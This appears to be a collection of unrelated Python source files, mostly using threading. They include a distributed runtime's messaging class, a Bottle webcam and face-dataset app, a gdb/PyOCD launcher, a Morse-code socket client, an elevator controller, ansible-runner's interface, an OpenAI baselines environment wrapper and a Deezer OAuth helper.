""" Called from Runtime to get a list of print requests for its own threads
Returns a list of (thread_uid, msg) tuples
"""
return self._get_list( self._print_req )
def send_print_request(self, orig_runtime_id, thread_uid, msg):
""" Called from Runtime to send a print request to responsible runtime
Parameters:
-- orig_runtime_id: runtime_id of the original runtime
-- thread_uid: (program_id, thread_id)
-- msg: message to print
"""
if orig_runtime_id == self.runtime_id:
self._print_req.put( (thread_uid, msg) )
else:
packet = make_packet(
PacketType.RUNTIME_PRINT_REQ,
thread_uid=thread_uid,
msg=msg
)
self._to_send.put( (orig_runtime_id, packet) )
def add_print_request(self, packet):
""" Called from NetHandler to add a print request which has arrived """
thread_uid, msg = packet['thread_uid'], packet['msg']
self._print_req.put( (thread_uid, msg))
def get_status_requests(self):
""" Called from Runtime to get a list of thread status changes of its own threads
Returns a list of (thread_uid, status) tuples
"""
return self._get_list( self._status_req )
def send_status_request(self, orig_runtime_id, thread_uid, new_status, waiting_from=None):
""" Called from Runtime to notify the thread's responsible
runtime, for a thread status change
Parameters:
-- orig_runtime_id: runtime_id of the original runtime
-- thread_uid: (program_id, thread_id)
-- msg: message to print
"""
if orig_runtime_id == self.runtime_id:
self._status_req.put( (thread_uid, (new_status, waiting_from)) )
else:
packet = make_packet(
PacketType.RUNTIME_STATUS_REQ,
thread_uid=thread_uid,
status=new_status,
waiting_from=waiting_from
)
self._to_send.put( (orig_runtime_id, packet) )
def add_status_request(self, packet):
""" Called from NetHandler to add a thread status request which has arrived """
thread_uid, status, waiting_from = packet['thread_uid'], packet['status'], packet['waiting_from']
self._status_req.put( (thread_uid, (status, waiting_from)) )
def get_migrated_threads(self):
""" Called from Runtime to get a list of newly migrated threads """
return self._get_list( self._migration_req )
def migrate_thread(self, thread_uid, thread_package, new_location):
""" Called from Runtime to migrate the thread
Parameters:
-- thread_package: the thread package we want to migrate
-- new_location: runtime_id of the target runtime
"""
if new_location == self.runtime_id:
return
# Send packet
packet = make_packet(
PacketType.MIGRATE_THREAD,
thread_uid=thread_uid,
payload=thread_package
)
self._to_send.put( (new_location, packet) )
# Wait for ACK
self._sem.acquire()
# Update thread location
if self._migrate_sucess:
self.update_thread_location(thread_uid, new_location)
return True
return False
def migrate_thread_completed(self, result):
""" Called from NetHandler to signal runtime that the migration is over """
self._migrate_sucess = result
# Unblock runtime
self._sem.release()
def add_thread_migration(self, packet):
""" Called from NetHandler once a MIGRATE_THREAD packet has arrived """
thread_uid, thread_blob = packet['thread_uid'], packet.payload
self._migration_req.put(thread_blob)
self.update_thread_location(thread_uid, self.runtime_id)
def update_thread_location(self, thread_uid, new_location):
""" Called from NetHandler once a MIGRATION_COMPLETED packet has been received
or from Runtime to update its own threads location
Parameters:
-- thread_uid: (program_id, thread_id)
-- new_location: runtime_id of its new location
"""
self._fwd_table[thread_uid] = new_location
def get_to_send_requests(self):
""" Called from NetHandler """
return self._get_list( self._to_send )
def get_runtimes(self):
return self.nethandler.runtimes
def shutdown(self):
self.nethandler.shutdown()
def _get_list(self, queue):
""" Return a list from a ThreadSafe Queue """
list = [ ]
while True:
try:
list.append( queue.get(block=False) )
except Empty:
break
return list
def _get_runtime_id(self, thread_uid):
""" Return the id of the runtime that currently runs this thread """
if thread_uid not in self._fwd_table:
packet = make_packet(
PacketType.DISCOVER_THREAD_REQ,
thread_uid=thread_uid
)
self._to_send.put( (None, packet) )
# Wait for DISCOVER_THREAD_REP
self._sem.acquire()
return self._fwd_table[thread_uid]
|
main.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 3 00:40:34 2018
@author: hmagg
"""
import threading
import glob
import sqlite3
import bottle
from bottle import route, run, debug, template, static_file, get, request, response, BaseTemplate, redirect
import os
app = bottle.default_app()
BaseTemplate.defaults['get_url'] = app.get_url
from TrainModel import TrainModel
import cv2
from queue import Queue, Empty
button_pressed = Queue()
#global stop_variable
#stop_variable = False
vc = cv2.VideoCapture(0)
"""if __name__ == '__main__':
threading.Thread(target=run, kwargs=dict(host='localhost', port=8080)).start()"""
def gen():
"""Video streaming generator function.
global stop_variable
#stop_variable = ""
while (True):
#print('Inside While')
rval, frame = vc.read()
cv2.imwrite('t.jpg', frame)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + open('t.jpg', 'rb').read() + b'\r\n')
print(stop_variable)
if stop_variable:
vc.close()
break"""
running = True
while running:
try:
button_pressed.get_nowait()
running = False
vc.release()
except Empty:
#print('Inside While')
rval, frame = vc.read()
cv2.imwrite('t.jpg', frame)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + open('t.jpg', 'rb').read() + b'\r\n')
@route('/stop', method='POST')
def stop():
#global stop_variable
#stop_variable = request.forms.get('submit')
#stop_variable = True
#print(stop_variable)
button_pressed.put(1)
print(button_pressed)
return "stopped"
@route('/', name='video_feed')
def video_feed():
response.content_type = 'multipart/x-mixed-replace; boundary=frame'
return gen()
#global stop_variable
#stop_variable = False
#if __name__ == '__main__':
@route('/index')
def load_index():
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT id, task FROM todo WHERE status LIKE '1'")
result = c.fetchall()
c.close()
insertdata = template('landing_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/<filename:path>', name='static')
def serve_static(filename):
return static_file(filename, root='/home/phoenix/facialrecognition/')
@route('/image')
def upload_image():
directory = glob.glob('dataset/*')
#print(directory)
path = []
for d in directory:
path.append(glob.glob(d+'/*'))
print(path)
#return template("gallery", image_names=images)
#info = {'image_info': path}
insertdata = template('image_page_insertdata', image_info=path)
output = template('landing_page', template=insertdata)
#output = template('landing_page', template=template('complete.tpl'))
return output
@route('/livestream')
def load_image():
insertdata = template('livestream_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/notification')
def load_image():
insertdata = template('notification_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/upload', method='POST')
def do_upload():
uname = request.forms.get('name')
upload = request.files.get('upload')
name, ext = os.path.splitext(upload.filename)
if ext not in ('.png', '.jpg', '.jpeg'):
return "File extension not allowed."
save_path = "dataset/{uname}".format(uname=uname)
if not os.path.exists(save_path):
os.makedirs(save_path)
file_path = "{path}/{file}".format(path=save_path, file=upload.filename)
upload.save(file_path)
#return "File successfully saved to '{0}'.".format(save_path)
redirect('/image')
#return "File successfully saved to '{0}'.".format(save_path)
@route('/train', method='POST')
def train():
x = TrainModel()
x.generate_pickle_file()
return "stopped"
@get("/static/css/<filepath:re:.*\.css>")
def css(filepath):
return static_file(filepath, root="static/css")
@get("/static/fonts/<filepath:re:.*\.(eot|otf|svg|ttf|woff|woff2?)>")
def font(filepath):
return static_file(filepath, root="static/fonts")
@get("/static/img/<filepath:re:.*\.(jpg|png|gif|ico|svg)>")
def img(filepath):
return static_file(filepath, root="static/img")
@get("/static/js/<filepath:re:.*\.js>")
def js(filepath):
return static_file(filepath, root="static/js")
#debug(True)
#run(reloader=True)
#run()
if __name__ == '__main__':
threading.Thread(target=run, kwargs=dict(host='localhost', port=8080)).start()
threading.Thread(target = gen).start()
|
gdb.py
|
#!/usr/bin/env python
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import subprocess
import logging
import threading
import signal
import traceback
try:
import Queue
except ImportError:
import queue as Queue
logger = logging.getLogger('gdb')
def _ignoreSignal(signum, frame):
logging.debug('ignoring signal %s, traceback:\n%s' % (
signum, ''.join(traceback.format_list(traceback.extract_stack(frame)))
))
def _launchPyOCDGDBServer(msg_queue):
logger.info('preparing PyOCD gdbserver...')
from pyOCD.gdbserver import GDBServer
from pyOCD.board import MbedBoard
gdb = None
try:
logger.info('finding connected board...')
board_selected = MbedBoard.chooseBoard(blocking=False)
if board_selected is not None:
with board_selected as board:
logger.info('starting PyOCD gdbserver...')
gdb = GDBServer(
board, 3333, {
'break_at_hardfault': True,
'step_into_interrupt': False,
'break_on_reset': False,
}
)
if gdb.isAlive():
msg_queue.put('alive')
while gdb.isAlive():
gdb.join(timeout = 0.5)
# check for a "kill" message from the parent process:
try:
msg = msg_queue.get(False)
if msg == 'kill':
gdb.stop()
break
except Queue.Empty:
pass
else:
logger.error('failed to find a connected board')
except Exception as e:
logger.error('exception in GDB server thread: %s', e)
if gdb != None:
gdb.stop()
raise
msg_queue.put('dead')
def launcher(gdb_exe):
def launch_gdb(projectfiles, executable):
# the "projectfiles" for gdb are really command files that we should
# execute to set up the debug session:
cmd = [gdb_exe]
for f in projectfiles:
cmd += ['-x', f]
cmd.append(executable)
# ignore Ctrl-C while gdb is running:
signal.signal(signal.SIGINT, _ignoreSignal);
child = subprocess.Popen(cmd)
child.wait()
return launch_gdb
def arm_none_eabi_launcher(gdb_exe):
gdb_launcher = launcher(gdb_exe)
def launch_arm_gdb(projectfiles, executable):
queue = Queue.Queue()
t = threading.Thread(target=_launchPyOCDGDBServer, args=(queue,))
try:
t.start()
# wait for an 'alive' message from the server before starting gdb
# itself:
msg = None
while msg != 'alive':
try:
msg = queue.get(timeout=1.0)
except Queue.Empty as e:
msg = None
pass
if msg == 'dead' or not t.is_alive():
raise Exception('gdb server failed to start')
except KeyboardInterrupt as e:
logger.error('stopped by user')
queue.put('kill')
t.join()
raise
gdb_launcher(projectfiles, executable)
queue.put('kill')
t.join()
return launch_arm_gdb
|
client.py
|
import threading
import time
import socket
import os
from datetime import datetime
from datetime import timedelta
from appJar import gui
import pyaudiomanager
import morsepacket
localNoiseRunning = 0 #flag is set when morse code noise is playing due to local user action
remoteNoiseRunning = 0 #flag is set when morse code noise is playing due to remote user action
port = 60001 #port to listen for signals from
remoteConnection = None #connection received from socket.accept()
destIp = "127.0.0.1" #if address of destination. set to default value
lastMessage = "u" #used to prevent sending many signals when the spacebar is held down
confirmConnection = 0 #flag set if socket.connect() returns with connection
shouldNotQuit = True #flag set to signal main loop to exit
app = None #gui of the program
pyAudioManager = None #PyAudioManager instance
events = None #event list to replay at the right time
firstMessageTime = None #datetime when first message from remote was received
delay = 3 #number of seconds to delay the playback of received morse messages
firstSendTime = None #local datetime when the first message was sent to the remote
username = None #username to send messages with
startTime = datetime.now()
###########################################################
# Modify timedelta in packet, add to list and sort list
###########################################################
def addNewEvent(morsePacket):
global events
global firstMessageTime
currentIndex = 0
insertedOutOfPlace = 0
modified = morsePacket
modified.setEventTime(modified.getEventTime() + timedelta(seconds=delay))
modified.setEventTime(modified.getEventTime() + firstMessageTime)
if(events == None or len(events) == 0):
events = [modified]
else:
for event in events:
if(event.getEventTime() >= modified.getEventTime()):
insertedOutOfPlace = 1
events.insert(currentIndex,modified)
break
currentIndex += 1
if(insertedOutOfPlace == 0):
events.append(modified)
###########################################################
# Start a thread running the function eventPlaybackThread()
###########################################################
def startEventPlaybackThread():
t = threading.Thread(target=eventPlaybackThread)
t.start()
###########################################################
# Loop and wait for the correct system time to play back the next event in events list
###########################################################
def eventPlaybackThread():
global shouldNotQuit
global remoteNoiseRunning
global events
nextEventTime = None
while(shouldNotQuit == True):
dt = datetime.now()
if(events != None and len(events) > 0):
nextEventTime = events[0].getEventTime()
if(nextEventTime <= (dt-startTime)):
if(events[0].getEventType() == "u"): #if remote signals that spacebar was released.
killReceivedAudio()
elif (events[0].getEventType() == "d"): #if remote signals that spacebar was pressed down.
if(remoteNoiseRunning == 0): #only start the audio if not already playing
startReceivedAudioThread()
events.pop(0)
time.sleep(0.005)
###########################################################
# Add the morse clicker and exit buttons to the gui and remove label
###########################################################
def addButtonsToGui():
global app
app.removeLabel("label")
clicker = app.addButton("paddle", None)
clicker.bind("<Button-1>", buttonPressed, add="+")
clicker.bind("<ButtonRelease-1>", buttonReleased, add="+")
###########################################################
# Close resources and exit program properly
###########################################################
def quit(suppress):
global shouldNotQuit
global app
shouldNotQuit = False
app.stop()
###########################################################
# Start audio with a lower noise to signify message from remote
###########################################################
def startReceivedAudioThread():
global remoteNoiseRunning
if(remoteNoiseRunning != 0):
return
remoteNoiseRunning = 1
t = threading.Thread(target=startRemoteAudio)
t.start()
###########################################################
# killLocalAudio audio with a lower noise to signify remote message over
###########################################################
def killReceivedAudio():
global remoteNoiseRunning
remoteNoiseRunning = 0
###########################################################
# Start the audio thread and send a press signal to destination
###########################################################
def buttonPressed(suppress):
global remoteConnection
global lastMessage
global firstSendTime
message = None
if(firstSendTime == None):
firstSendTime = datetime.now()
dt = datetime.now()
if(lastMessage == "u"):
message = ("d," + str(dt - firstSendTime) + "," + str(username)).encode()
try:
remoteConnection.send(message)
except OSError:
print("OSError, server likely disconnected.")
return
lastMessage = "d"
startLocalAudioThread()
###########################################################
# killLocalAudio audio thread and send a release signal to destination
###########################################################
def buttonReleased(suppress):
global remoteConnection
global lastMessage
message = None
dt = datetime.now()
if(lastMessage == "d"):
message = ("u," + str(dt - firstSendTime) + "," + str(username)).encode()
remoteConnection.send(message)
lastMessage = "u"
killLocalAudio()
###########################################################
# Start a thread to play audio
###########################################################
def startLocalAudioThread():
global localNoiseRunning
if(localNoiseRunning != 0):
return
localNoiseRunning = 1
t = threading.Thread(target=startLocalAudio)
t.start()
###########################################################
# Set flag to stop running the audio thread
###########################################################
def killLocalAudio():
global localNoiseRunning
localNoiseRunning = 0
###########################################################
# Play a beep while the killLocalAudio() function has not been called
###########################################################
def startLocalAudio():
global pyAudioManager
while(localNoiseRunning == 1):
pyAudioManager.getLocalMorseStream().write(pyAudioManager.getLocalSound())
###########################################################
# Play a beep while the killLocalAudio() function has not been called
###########################################################
def startRemoteAudio():
global pyAudioManager
while(remoteNoiseRunning == 1):
pyAudioManager.getRemoteMorseStream().write(pyAudioManager.getRemoteSound())
###########################################################
# Main method
###########################################################
def main():
global confirmConnection
global destIp
global remoteConnection
global shouldNotQuit
global pyAudioManager
global firstMessageTime
remoteMessage = None
morsePacket = None
#Get ip address argument
destIp = os.sys.argv[1]
username = os.sys.argv[2]
#connect to remote machine. Retry indefinitely until user terminates program.
remoteConnection = socket.socket()
remoteConnection.settimeout(1)
while(confirmConnection == 0):
time.sleep(1)
try:
remoteConnection.connect((destIp, port))
confirmConnection = 1
except Exception:
confirmConnection = 0
addButtonsToGui()
startEventPlaybackThread()
pyAudioManager = pyaudiomanager.PyAudioManager()
pyAudioManager.initAudioStuff()
#programs loops forever, waiting for a message from the remote machine to play back the
#noise to the local user.
remoteConnection.send(username.encode())
while(shouldNotQuit == True):
try:
remoteMessage = remoteConnection.recv(1024)
if(remoteMessage.decode() == ""):
shouldNotQuit = False
continue
if(firstMessageTime == None):
firstMessageTime = datetime.now() - startTime
morsePacket = morsepacket.MorsePacket(remoteMessage)
addNewEvent(morsePacket)
except Exception as e:
if(e.__class__.__name__ == "timeout"):
remoteMessage = ""
elif(isinstance(e, OSError)):
print("OSError exception, exiting...")
shouldNotQuit = False
pyAudioManager.close()
remoteConnection.close()
if(len(os.sys.argv) != 3):
print("usage: python client.py <dest> <username>")
os.sys.exit(1)
app = gui(handleArgs=False)
app.addLabel("label", "Waiting to connect to server... click exit button to quit")
exit = app.addButton("exit", quit)
app.thread(main)
app.go()
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Universal utitlities
"""
import sys
import time
from functools import wraps
from contextlib import contextmanager
from Queue import Queue
from threading import Thread
def apply_function(f, *args, **kwargs):
""" Apply a function or staticmethod/classmethod to the given arguments.
"""
if callable(f):
return f(*args, **kwargs)
elif len(args) and hasattr(f, '__get__'):
# support staticmethod/classmethod
return f.__get__(None, args[0])(*args, **kwargs)
else:
assert False, "expected a function or staticmethod/classmethod"
def retry(forgivable_exceptions, forgive=lambda x: True,
tries=5, delay=5, backoff=2, logger=None):
"""Retry decorator with exponential backoff.
`forgivable_exceptions` is a type of Exception(or Exception tuple)
`forgive` is a function which takes the caught exception as its argument,
the meaning of its return value is as follows:
a negative object(e.g. `False`, `None`) means the old exception will be
rethrown, an `Exception` object means it will be thrown,
otherwise the failed call is forgiven and will be retried.
Furthermore, if the return value is a function, it will be invoked
before the next try. This function takes the retried call's first
argument(if any) as its argument(which is typically the calling object).
Inspired by:
http://www.saltycrane.com/blog/2009/11/trying-out-retry-decorator-python/
"""
def decorator(f):
if tries < 1:
raise ValueError("tries must be at least 1")
@wraps(f)
def wrapper(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except forgivable_exceptions as e:
forgiven = apply_function(forgive, e) or e
if isinstance(forgiven, BaseException):
if logger:
logger.debug("just give up: {}".format(e))
raise forgiven
msg = "Error: {}. Retry in {} seconds...".format(
str(e), mdelay)
if logger:
logger.debug(msg)
else:
print msg
time.sleep(mdelay)
mtries -= 1
mdelay *= backoff
if callable(forgiven):
forgiven(args[0] if len(args) else None)
return f(*args, **kwargs) # last chance
return wrapper
return decorator
class JobQueue(object):
"""A threaded job queue
"""
def __init__(self, threads):
self._threads = threads
self._thread_enabled = threads > 1
self._queue = None
def disable_thread(self):
self._thread_enabled = False
def start(self):
if self._threads <= 1:
return
# calling start will automatically enable thread
self._thread_enabled = True
if self._queue: # threads already created
return
queue = self._queue = Queue()
def work():
while True:
func, args, kwargs = queue.get()
try:
func(*args, **kwargs)
finally:
queue.task_done()
for _ in range(self._threads):
t = Thread(target=work)
t.daemon = True
t.start()
def finish(self):
if self._queue:
self._queue.join()
def add_task(self, func, *args, **kwargs):
if self._thread_enabled and self._queue:
self._queue.put((func, args, kwargs))
else:
func(*args, **kwargs)
@contextmanager
def threaded(queue):
"""Wrap the block with the threaded queue
"""
queue.start()
try:
yield
finally:
queue.finish()
@contextmanager
def uniform_open(filename=None, mode="w"):
if mode == 'w':
default_fp = sys.stdout
elif mode == 'r':
default_fp = sys.stdin
else:
raise ValueError("wrong file mode: {}".format(mode))
if filename:
fp = open(filename, mode)
else:
fp = default_fp
try:
yield fp
finally:
if fp is not default_fp:
fp.close()
def trans_str(string, from_chars, to_chars, encoding='utf8'):
"""Translate a string from one charset to the other
"""
from_unicode = from_chars.decode(encoding)
to_unicode = to_chars.decode(encoding)
trans_tbl = dict(zip(map(ord, from_unicode), map(ord, to_unicode)))
str_unicode = string.decode(encoding)
return str_unicode.translate(trans_tbl).encode(encoding)
|
Controller.py
|
from Elevator import Elevator
import threading
import time
class Controller:
"""control a group of elevators"""
def __init__(self, num_floors, num_elevators):
self.floors = num_floors
self.num_elevators = num_elevators
self.elevators = []
self.pending_targets = {}
self.new_floor_calls = []
self.new_elevator_calls = []
for i in range(num_elevators):
self.elevators.append(Elevator(i, self.floors))
self.pending_targets[i] = []
self.control_loop = threading.Thread(target=self.state_loop, args=(True,))
self.control_loop.start()
self.input_loop()
def state_loop(self, debug=False):
"""state machine event-based elevator algorithm"""
while True:
new_reqs = []
if len(self.new_floor_calls) > 0:
for floor in self.new_floor_calls:
new_reqs.append(floor)
self.elevators[0].target(int(new_reqs[0]))
# if len(self.new_elevator_calls) > 0:
# for arr in self.new_elevator_calls:
# new_reqs.append(arr)
self.update_routine()
time.sleep(1)
def input_loop(self):
while True:
data1 = input(
"\nPress 'c' to make a new elevator call.\nPress 'd' to direct an elevator.\nPress 'p' to print out elevators. \n")
if data1 == "c":
data2 = input("Choose a floor (1-" + str(self.floors - 1) + ")")
self.new_floor_calls.append(data2)
elif data1 == "d":
data2 = input("Choose your elevator: 0-" + str(self.num_elevators - 1))
data3 = input("Now choose a floor (0-" + str(self.floors - 1) + ")")
self.new_elevator_calls.append([data2, data3])
elif data1 == "p":
for elevator in self.elevators:
print(elevator)
def update_routine(self):
for elevator in self.elevators:
elevator.update()
if __name__ == "__main__":
controller1 = Controller(10, 1)
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
dump_artifacts(kwargs)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
check_isolation_executable_installed(kwargs.get("process_isolation_executable", "bwrap"))
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overridees the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Commnad line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param process_isolation: Enable limiting what directories on the filesystem the playbook run has access to.
:param process_isolation_executable: Path to the executable that will be used to provide filesystem isolation (default: bwrap)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type quiet: bool
:type verbosity: int
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:returns: A :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
|
multiprocessing_env.py
|
#This code is from openai baseline
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import numpy as np
from multiprocessing import Process, Pipe
import gym
import gym_sokoban
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
|
auth.py
|
import time
import uuid
import webbrowser
from threading import Thread
from flask import Flask, redirect, request, render_template
from urllib import parse
HOST = "localhost"
PORT = "8080"
HOME_URI = f"http://{HOST}:{PORT}/"
REDIRECT_URI = f"{HOME_URI}token"
AUTH_ENDPOINT = "https://connect.deezer.com/oauth/auth.php"
CLIENT_ID = 461222
app = Flask(__name__)
def auth_uri(scope="manage_library", response_type="token", **kwargs):
kwargs.update(
{
"client_id": CLIENT_ID,
"scope": scope,
"response_type": response_type,
"redirect_uri": REDIRECT_URI,
}
)
return f"{AUTH_ENDPOINT}?{parse.urlencode(kwargs)}"
@app.route("/", methods=["GET"])
def forward_to_deezer():
uri = auth_uri()
return redirect(uri)
@app.route("/token", methods=["GET"])
def auth_sucess():
if request.args.get("error_reason") == "user_denied":
return "Error: user declined auth"
return render_template("token.html")
@app.route("/submit", methods=["GET"])
def receive_token():
global TOKEN
TOKEN = request.args.get("access_token")
shutdown_func = request.environ.get("werkzeug.server.shutdown")
if shutdown_func is None:
raise RuntimeError("Not running with the Werkzeug Server")
# Surprisingly this works, I guess werkzeug attempts a graceful shutdown.
shutdown_func()
return "Autentication complete, you may now close this tab."
